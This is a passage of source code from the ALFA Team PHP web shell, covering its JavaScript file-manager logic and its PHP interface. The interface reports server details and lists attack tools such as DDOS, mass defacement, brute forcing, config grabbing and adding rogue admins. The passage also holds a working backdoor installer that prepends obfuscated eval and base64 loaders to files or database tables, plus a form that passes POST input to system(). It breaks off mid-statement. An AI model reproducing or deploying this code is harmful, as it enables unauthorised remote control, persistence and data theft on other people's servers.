t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id=\'"+e+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(a,i,e)+"</div><div class=\'editor-file-name\'>"+a+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\\""+e+"\\");\'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class=\'editor-icon\'>"+loadType(editor_files[t].file,e,t)+"</div><div class=\'editor-file-name\'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return\'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor(\'"+a+"\',\'auto\',\'\',\'\',\'\',\'file\')"),$(r).setAttribute("onclick","editor(\'"+a+"\',\'edit\',\'\',\'\',\'\',\'"+s+"\')"),$(n).setAttribute("onclick","g(\'FilesTools\',null,\'"+a+"\', \'download\')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g(\'FilesMan\', \'"+c_+"/"+a+"\')")),$(i).setAttribute("onclick","editor(\'"+a+"\',\'chmod\',\'\',\'\',\'\',\'"+s+"\')"),$(l).setAttribute("onclick","editor(\'"+a+"\',\'rename\',\'\',\'\',\'\',\'"+s+"\')"),$(o).setAttribute("onclick","editor(\'"+a+"\',\'touch\',\'\',\'\',\'\',\'"+s+"\')"),$(d).setAttribute("onclick","var chk = confirm(\'Are You Sure For Delete # "+a+" # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'"+a+"\') : \'\';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\\/\\//g,"/"),l=l.replace(/\\/\\//g,"/"),-1!=(t=t.replace(/\\/\\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\\/\\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\\/\\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};\r\n</script>\r\n<?php echo"<form style=\'display:none;\' id=\'dlForm\' action=\'\' target=\'_blank\' method=\'post\'>\r\n<input type=\'hidden\' name=\'a\' value=\'dlfile\'>\r\n<input type=\'hidden\' name=\'c\' value=\'\'>\r\n<input type=\'hidden\' name=\'file\' value=\'\'>\r\n</form>\r\n<input type=\'file\' style=\'display:none;\' id=\'importFileBtn\' onchange=\'importConfig(event);\'>\r\n<div id=\'a_loader\'><img src=\'".__showicon(\'loader\')."\'></div>";\r\n$cmd_uname = alfaEx("uname -a",false,false);\r\n$uname = function_exists(\'php_uname\') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:\'( php_uname ) Function Disabled !\');\r\nif($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}\r\necho \'\r\n</head>\r\n<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">\r\n<div id="up_bar_holder"></div>\r\n<div class="whole">\r\n<form method="post" name="mf" style="display:none;">\r\n<input type="hidden" name="a">\r\n<input type="hidden" name="c" value="\'.$GLOBALS[\'cwd\'].\'">\';\r\nfor($s=1;$s<=10;$s++){\r\necho \'<input type="hidden" name="alfa\'.$s.\'">\';\r\n}\r\necho \'<input type="hidden" name="charset">\r\n</form>\r\n<div id=\\\'hidden_sh\\\'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">\'.__ALFA_CODE_NAME__.\'</span><br><small>Version: <span class="hidden_shell_version">\'.__ALFA_VERSION__.\'</span></small></a></div>\r\n<div class="header"><table width="100%" border="0">\r\n<tr>\r\n<td width="3%"><span class="header_vars">Uname:</span></td>\r\n<td colspan="2"><span class="header_values" id="header_uname">\'.$uname.\'</span></td>\r\n</tr>\r\n<tr>\r\n<td><span class="header_vars">User:</span></td>\r\n<td><span class="header_values" id="header_userid">\'. $uid . \' [ \' . $user . \' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">\' . $gid . \' [ \' . $group . \' ]</span> </td>\r\n<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>\r\n</tr>\r\n<tr>\r\n<td><span class="header_vars">PHP:</span></td>\r\n<td><b>\'.@phpversion(). \' </b><span class="header_vars"> Safe Mode: \'.$safe_modes.\'</span></td>\r\n</tr>\r\n<tr>\r\n<td><span class="header_vars">ServerIP:</span></td>\r\n<td><b>\'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER[\'SERVER_NAME\']):\'????\'):@$_SERVER["SERVER_ADDR"]).\'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> \'.@$_SERVER["REMOTE_ADDR"].\'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>\r\n</tr>\r\n<tr>\r\n<td width="3%"><span class="header_vars">DateTime:</span></td>\r\n<td colspan="2"><b>\'.date(\'Y-m-d H:i:s\').\'</b></td>\r\n</tr>\r\n<tr>\r\n<td><span class="header_vars">Domains:</span></td>\r\n<td width="76%"><span class="header_values" id="header_domains">\';\r\nif($GLOBALS[\'sys\']==\'unix\'){\r\n$d0mains = _alfa_file("/etc/named.conf",false);\r\nif(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{\r\n$count=0;\r\nforeach($d0mains as $d0main){\r\nif(@strstr($d0main,"zone")){\r\npreg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\nflush();\r\nif(strlen(trim($domains[1][0])) > 2){\r\nflush();\r\n$count++;}}}\r\necho "$count Domains";}}\r\nelse{echo("Cant Read [ /etc/named.conf ]");}\r\necho \'</span></td>\r\n</tr>\r\n<tr>\r\n<td height="16"><span class="header_vars">HDD:</span></td>\r\n<td><span class="header_vars">Total:</span><b>\'.alfaSize($totalSpace).\' </b><span class="header_vars">Free:</span><b>\' . alfaSize($freeSpace) . \' [\'. (int) ($freeSpace/$totalSpace*100) . \'%]</b></td>\r\n</tr>\';\r\nif($GLOBALS[\'sys\']==\'unix\'){\r\n$useful_downloader = \'<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>\';\r\nif(!@ini_get(\'safe_mode\')){\r\nif(strlen(alfaEx("id",false,false))>0){\r\necho \'<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>\';\r\n$userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzialfa2\',\'nc\',\'locate\',\'suidperl\');\r\n$x=0;\r\nforeach($userful as $item)if(alfaWhich($item)){$x++;echo \'<span class="header_values" style="margin-left: 4px;">\'.$item.\'</span>\';}\r\nif($x==0){echo "<span class=\'header_values\' id=\'header_useful\'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}\r\necho \'</td>\r\n</tr>\r\n<tr>\r\n<td height="0" colspan="2"><span class="header_vars">Downloader: </span>\';\r\n$downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n$x=0;\r\nforeach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo \'<span class="header_values" style="margin-left: 4px;">\'.$item2.\'</span>\';}\r\nif($x==0){echo "<span class=\'header_values\' id=\'header_downloader\'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}\r\necho \'</td>\r\n</tr>\';\r\n}else{\r\necho $useful_downloader;$GLOBALS["need_to_update_header"] = "true";\r\n}\r\n}else{\r\necho $useful_downloader;$GLOBALS["need_to_update_header"] = "true";\r\n}\r\n}else{\r\necho \'<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>\';\r\necho alfaEx(\'ver\',false,false);\r\necho \'</td>\r\n</tr> <tr>\r\n<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>\r\n</tr></b>\';\r\n}\r\n$quotes = (function_exists(\'get_magic_quotes_gpc\')?get_magic_quotes_gpc():\'0\');if ($quotes == "1" or $quotes == "on"){$magic = \'<b><span class="header_on">ON</span>\';}else{$magic = \'<span class="header_off">OFF</span>\';}\r\necho \'<tr>\r\n<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>\'.Alfa_GetDisable_Function().\'</b></td>\r\n</tr>\r\n<tr>\r\n<td height="16" colspan="2"><span class="header_vars">CURL :</span>\'.$curl.\' | <span class="header_vars">SSH2 : </span>\'.$ssh2.\' | <span class="header_vars">Magic Quotes : </span>\'.$magic.\' | <span class="header_vars"> MySQL :</span>\'.$mysql.\' | <span class="header_vars">MSSQL :</span>\'.$mssql.\' | <span class="header_vars"> PostgreSQL :</span>\'.$pg.\' | <span class="header_vars"> Oracle :</span>\'.$or.\' \'.($GLOBALS[\'sys\']=="unix"?\'| <span class="header_vars"> CGI :</span> \'.$cgi_shell:"").\'</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></div></td>\r\n</tr>\r\n<tr>\r\n<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>\'.$open_b.\'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>\'.$safe_exe.\'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>\'.$safe_include.\'</b></td>\r\n</tr>\r\n<tr>\r\n<td height="11"><span class="header_vars">SoftWare: </span></td>\r\n<td colspan="2"><b>\'.@getenv(\'SERVER_SOFTWARE\').\'</b></td>\r\n</tr>\';\r\nif($GLOBALS[\'sys\']=="win"){\r\necho \'<tr>\r\n<td height="12"><span class="header_vars">DRIVE:</span></td>\r\n<td colspan="2"><b>\'.$drives.\'</b></td>\r\n</tr>\';\r\n}\r\necho \'<tr>\r\n<td height="12"><span class="header_vars">PWD:</span></td>\r\n<td colspan="2"><span id="header_cwd">\'.$cwd_links.\' </span><a href="#action=fileman&path=\'.$GLOBALS[\'home_cwd\'].\'" onclick="g(\\\'FilesMan\\\',\\\'\' . $GLOBALS[\'home_cwd\'] . \'\\\',\\\'\\\',\\\'\\\',\\\'\\\')"><span class="home_shell">[ Home Shell ]</span> </a></td>\r\n</tr>\r\n</table>\r\n</div>\r\n<div id="meunlist">\r\n<ul>\r\n\';\r\n$li = array(\'proc\'=>\'Process\',\'phpeval\'=>\'Eval\',\'sql\'=>\'SQL Manager\',\'dumper\'=>\'Database Dumper\',\'coldumper\'=>\'Column Dumper\',\'hash\'=>\'En-Decoder\',\'connect\'=>\'BC\',\r\n\'zoneh\'=>\'ZONE-H\',\'dos\'=>\'DDOS\',\'safe\'=>\'ByPasser\',\'cgishell\'=>\'Cgi Shell\',\'ssiShell\'=>\'SSI SHELL\',\'cpcrack\'=>\'Hash Tools\',\r\n\'portscanner\'=>\'Port Scaner\',\'basedir\'=>\'Open BaseDir\',\'mail\'=>\'Fake Mail\',\'ziper\'=>\'Compressor\',\'deziper\'=>\'DeCompressor\',\'IndexChanger\'=>\'Index Changer\',\'pwchanger\'=>\'Add New Admin\',\'ShellInjectors\'=>\'Shell Injectors\',\r\n\'php2xml\'=>\'PHP2XML\',\'cloudflare\'=>\'CloudFlare\',\'Whmcs\'=>\'Whmcs DeCoder\',\'symlink\'=>\'Symlink\',\'MassDefacer\'=>\'Mass Defacer\',\'Crackers\'=>\'BruteForcer\',\'searcher\'=>\'Searcher\',\'config_grabber\'=>\'Config Grabber\',\'fakepage\'=>\'Fake Page\',\'archive_manager\'=>\'Archive Manager\',\r\n\'cmshijacker\'=>\'CMS Hijacker\',\'remotedl\'=>\'Remote Upload\',\'inbackdoor\'=>\'Install BackDoor\',\'whois\'=>\'Whois\',\'selfrm\'=>\'Remove Shell\'\r\n);\r\nforeach($li as $key=>$value){\r\necho(\'<li><a id="menu_opt_\'.$key.\'" href="#action=options&path=\'.$GLOBALS[\'cwd\'].\'&opt=\'.$key.\'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\\\'#action=options&path=\\\'+c_+\\\'&opt=\'.$key.\'\\\';g(\\\'\'.$key.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');d.querySelector(\\\'.opt-title\\\').innerHTML=this.innerHTML;">\'.$value.\'</a></li>\'."\\n");\r\n}\r\necho \'</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path=\'.$GLOBALS[\'cwd\'].\'&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\\\'#action=options&path=\\\'+c_+\\\'&opt=settings\\\';g(\\\'settings\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');d.querySelector(\\\'.opt-title\\\').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path=\'.$GLOBALS[\'cwd\'].\'&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\\\'#action=options&path=\\\'+c_+\\\'&opt=market\\\';g(\\\'market\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');d.querySelector(\\\'.opt-title\\\').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path=\'.$GLOBALS[\'cwd\'].\'&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\\\'#action=options&path=\\\'+c_+\\\'&opt=aboutus\\\';g(\\\'aboutus\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');d.querySelector(\\\'.opt-title\\\').innerHTML=this.innerHTML;">About Us</a>\'.(!empty($_COOKIE[\'AlfaUser\']) && !empty($_COOKIE[\'AlfaPass\']) ? \'<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>\':\'\').\'</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="\'.$GLOBALS[\'cwd\'].\'" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\\\'/\\\',1);">New Tab +</div></div>\';}else{\r\n@error_reporting(E_ALL ^ E_NOTICE);\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'magic_quotes_runtime\', 0);\r\n@set_time_limit(0);\r\n}}\r\nfunction alfalogout(){\r\n@setcookie("AlfaUser", null, 2012);\r\n@setcookie("AlfaPass", null, 2012);\r\nunset($_COOKIE[\'AlfaUser\'],$_COOKIE[\'AlfaPass\']);\r\necho("ok");\r\n}\r\nfunction showAnimation($name){\r\n\treturn \'-webkit-animation: \'.$name.\' 800ms ease-in-out forwards;-moz-animation: \'.$name.\' 800ms ease-in-out forwards;-ms-animation: \'.$name.\' 800ms ease-in-out forwards;animation: \'.$name.\' 800ms ease-in-out forwards;\';\r\n}\r\nfunction __showicon($r){\r\n\t$s[\'btn\']=\'http://solevisible.com/images/btn.png\';\r\n\t$s[\'alfamini\']=\'http://solevisible.com/images/alfamini.png\';\r\n\t$s[\'loader\']=\'http://solevisible.com/images/loader.svg\';\r\n\t//return \'data:image/png;base64,\'.__get_resource($s[$r]);\r\n\treturn $s[$r];\r\n}\r\n$alfasuccess=\'\r\n<form action="" method=post>\r\nCommand: <input name=c type=text size=100 value="<?php if (isset($_POST["c"])){print(stripslashes($_POST["c"]));} ?>">\r\n<input type=submit>\r\n</form>\r\n<pre>\r\n<?php if (isset($_POST["c"])){system(stripslashes($_POST["c"])." 2>&1");} ?>\r\n</pre>\';\r\nfunction alfainbackdoor(){\r\nalfahead();\r\n\r\necho \'<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'inbackdoor\\\',null,\\\'file\\\')">| In File | </a><a href=javascript:void(0) onclick="g(\\\'inbackdoor\\\',null,\\\'db\\\')">| In DataBase | </a></h3></center>\';\r\n$error = \'<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>\';\r\n$success= \'<font color="green">Success...!\';\r\n$textarea = "<div style=\'display:none;\' id=\'backdoor_textarea\'><div class=\'txtfont\'>Your Shell:</div><p><textarea name=\'shell\' rows=\'19\' cols=\'103\'><?php\\n\\techo(\'Alfa Team is Here...!\');\\n?></textarea></p></div>";\r\n$select = "<div class=\'txtfont\'>Use:</div> <select name=\'method\' style=\'width:155px;\' onChange=\'inBackdoor(this);\'><option value=\'alfa\'>Alfa Team Uploader</option><option value=\'my\'>My Private Shell</option></select>";\r\n$cwd = \'Example: /home/alfa/public_html/index.php\';\r\nif($_POST[\'alfa1\']==\'file\'){\r\necho("<center><p><div class=\'txtfont_header\'>| In File |</div></p><p><form onsubmit=\\"g(\'inbackdoor\',null,\'file\',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\\">{$select} <div class=\'txtfont\'>Backdoor Loader:</div> <input type=\'text\' name=\'file\' size=\'50\' placeholder=\'{$cwd}\'> <div class=\'txtfont\'>Key: </div> <input type=\'text\' name=\'key\' size=\'10\' value=\'alfa\'> <input type=\'submit\' value=\' \'>{$textarea}</form></p></center>");\r\n\r\nif($_POST[\'alfa2\']!=\'\'&&$_POST[\'alfa3\']!=\'\'&&$_POST[\'alfa4\']!=\'\'){\r\n$method = $_POST[\'alfa2\'];\r\n$file = $_POST[\'alfa3\'];\r\n$shell = $_POST[\'alfa4\'];\r\n$key = str_replace(array(\'"\',\'\\\'\'),\'\',trim($_POST[\'alfa5\']));\r\nif($key==\'\')$key=\'alfa\';\r\nif($method==\'my\'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS[\'__ALFA_SHELL_CODE\'];}\r\n$code = \'<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="\'.$key.\'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\\\'?>\\\'.base"."64"."_dec"."ode(\\$c));");$x("\'.$shell.\'");exit;}?>\';\r\nif(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.\'</font>\');}else{__alert($error);}}}\r\nif($_POST[\'alfa1\']==\'db\'){\r\necho("<center><p><div class=\'txtfont_header\'>| In DataBase |</div></p>".getConfigHtml(\'all\')."<p><form onsubmit=\\"g(\'inbackdoor\',null,\'db\',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\\">");\r\n$table = array(\'td1\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'db_host : \', \'inputName\' => \'db_host\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n\'td2\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'db_username : \', \'inputName\' => \'db_username\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n\'td3\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'db_password : \', \'inputName\' => \'db_password\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n\'td4\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'db_name : \', \'inputName\' => \'db_name\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n\'td5\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'Backdoor Loader: \', \'inputName\' => \'file\', \'inputValue\' => $cwd, \'inputSize\' => \'50\', \'placeholder\' => true),\r\n\'td6\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'Key: \', \'inputName\' => \'key\', \'inputValue\' => \'alfa\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho("<p>{$select}</p>");\r\necho($textarea);\r\necho("<p><input type=\'submit\' value=\' \'></p></form></p></center>");\r\nif($_POST[\'alfa2\']!=\'\'&&$_POST[\'alfa3\']!=\'\'&&$_POST[\'alfa5\']!=\'\'&&$_POST[\'alfa6\']!=\'\'){\r\n$dbhost = $_POST[\'alfa2\'];\r\n$dbuser = $_POST[\'alfa3\'];\r\n$dbpw = $_POST[\'alfa4\'];\r\n$dbname = $_POST[\'alfa5\'];\r\n$file = $_POST[\'alfa6\'];\r\n$method = $_POST[\'alfa7\'];\r\n$shell = $_POST[\'alfa8\'];\r\n$key = str_replace(array(\'"\',\'\\\'\'),\'\',trim($_POST[\'alfa9\']));\r\nif($key==\'\')$key=\'alfa\';\r\nif($method==\'my\'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS[\'__ALFA_SHELL_CODE\'];}\r\nif($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){\r\n$code = \'<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="\'.$key.\'"){$conn=mysqli_connect("\'.str_replace(\'"\',\'\\"\',$dbhost).\'","\'.str_replace(\'"\',\'\\"\',$dbuser).\'","\'.str_replace(\'"\',\'\\"\',$dbpw).\'","\'.str_replace(\'"\',\'\\"\',$dbname).\'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\\\'?>\\\'.base"."64"."_dec"."ode(\\$c));");$x($r["code"]);exit;}?>\';\r\nif(@is_file($file)&&@is_writable($file)){\r\n@mysqli_query($conn,\'DROP TABLE `alfa_bc`\');\r\n@mysqli_query($conn,\'CREATE TABLE `alfa_bc` (code LONGTEXT)\');\r\n@mysqli_query($conn,\'INSERT INTO `alfa_bc` 